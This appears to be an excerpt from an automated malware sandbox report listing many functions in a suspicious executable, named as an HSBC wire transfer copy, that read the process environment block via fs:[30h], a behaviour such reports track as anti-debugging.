Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]		6_2_01664A2C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]		6_2_0164A229
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01638A0A mov eax, dword ptr fs:[00000030h]		6_2_01638A0A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]		6_2_01625210
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01625210 mov ecx, dword ptr fs:[00000030h]		6_2_01625210
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]		6_2_01625210
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]		6_2_01625210
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]		6_2_0162AA16
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]		6_2_0162AA16
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01643A1C mov eax, dword ptr fs:[00000030h]		6_2_01643A1C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]		6_2_016EAA16
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]		6_2_016EAA16
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652AE4 mov eax, dword ptr fs:[00000030h]		6_2_01652AE4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]		6_2_016E4AEF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652ACB mov eax, dword ptr fs:[00000030h]		6_2_01652ACB
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]		6_2_016252A5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]		6_2_016252A5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]		6_2_016252A5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]		6_2_016252A5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]		6_2_016252A5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]		6_2_0163AAB0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]		6_2_0163AAB0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165FAB0 mov eax, dword ptr fs:[00000030h]		6_2_0165FAB0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]		6_2_0165D294
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]		6_2_0165D294
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]		6_2_0164C577
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]		6_2_0164C577
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01663D43 mov eax, dword ptr fs:[00000030h]		6_2_01663D43
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A3540 mov eax, dword ptr fs:[00000030h]		6_2_016A3540
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016D3D40 mov eax, dword ptr fs:[00000030h]		6_2_016D3D40
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01647D50 mov eax, dword ptr fs:[00000030h]		6_2_01647D50
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162AD30 mov eax, dword ptr fs:[00000030h]		6_2_0162AD30
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]		6_2_01633D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EE539 mov eax, dword ptr fs:[00000030h]		6_2_016EE539
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F8D34 mov eax, dword ptr fs:[00000030h]		6_2_016F8D34
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016AA537 mov eax, dword ptr fs:[00000030h]		6_2_016AA537
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]		6_2_01654D3B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]		6_2_01654D3B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]		6_2_01654D3B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]		6_2_0163D5E0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]		6_2_0163D5E0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]		6_2_016EFDE2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]		6_2_016EFDE2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]		6_2_016EFDE2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]		6_2_016EFDE2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016D8DF1 mov eax, dword ptr fs:[00000030h]		6_2_016D8DF1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]		6_2_016A6DC9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]		6_2_016A6DC9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]		6_2_016A6DC9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6DC9 mov ecx, dword ptr fs:[00000030h]		6_2_016A6DC9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]		6_2_016A6DC9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]		6_2_016A6DC9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]		6_2_016F05AC
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]		6_2_016F05AC
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016535A1 mov eax, dword ptr fs:[00000030h]		6_2_016535A1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]		6_2_01651DB5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]		6_2_01651DB5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]		6_2_01651DB5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]		6_2_01652581
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]		6_2_01652581
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]		6_2_01652581
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]		6_2_01652581
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]		6_2_01622D8A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]		6_2_01622D8A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]		6_2_01622D8A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]		6_2_01622D8A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]		6_2_01622D8A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]		6_2_016E2D82
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]		6_2_0165FD9B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]		6_2_0165FD9B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164746D mov eax, dword ptr fs:[00000030h]		6_2_0164746D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]		6_2_0165AC7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165A44B mov eax, dword ptr fs:[00000030h]		6_2_0165A44B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]		6_2_016BC450
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]		6_2_016BC450
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165BC2C mov eax, dword ptr fs:[00000030h]		6_2_0165BC2C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]		6_2_016A6C0A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]		6_2_016A6C0A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]		6_2_016A6C0A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]		6_2_016A6C0A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]		6_2_016F740D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]		6_2_016F740D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]		6_2_016F740D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]		6_2_016E1C06
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E14FB mov eax, dword ptr fs:[00000030h]		6_2_016E14FB
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]		6_2_016A6CF0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]		6_2_016A6CF0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A6CF0 mov eax, dword ptr fs:[00000030h]		6_2_016A6CF0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F8CD6 mov eax, dword ptr fs:[00000030h]		6_2_016F8CD6
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163849B mov eax, dword ptr fs:[00000030h]		6_2_0163849B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E4496 mov eax, dword ptr fs:[00000030h]		6_2_016E4496
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163FF60 mov eax, dword ptr fs:[00000030h]		6_2_0163FF60
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F8F6A mov eax, dword ptr fs:[00000030h]		6_2_016F8F6A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163EF40 mov eax, dword ptr fs:[00000030h]		6_2_0163EF40
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]		6_2_01624F2E
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01624F2E mov eax, dword ptr fs:[00000030h]		6_2_01624F2E
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165E730 mov eax, dword ptr fs:[00000030h]		6_2_0165E730
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]		6_2_0164B73D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164B73D mov eax, dword ptr fs:[00000030h]		6_2_0164B73D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]		6_2_016F070D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F070D mov eax, dword ptr fs:[00000030h]		6_2_016F070D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]		6_2_0165A70E
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165A70E mov eax, dword ptr fs:[00000030h]		6_2_0165A70E
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164F716 mov eax, dword ptr fs:[00000030h]		6_2_0164F716
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]		6_2_016BFF10
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BFF10 mov eax, dword ptr fs:[00000030h]		6_2_016BFF10
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016637F5 mov eax, dword ptr fs:[00000030h]		6_2_016637F5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01638794 mov eax, dword ptr fs:[00000030h]		6_2_01638794
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]		6_2_016A7794
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]		6_2_016A7794
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A7794 mov eax, dword ptr fs:[00000030h]		6_2_016A7794
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163766D mov eax, dword ptr fs:[00000030h]		6_2_0163766D
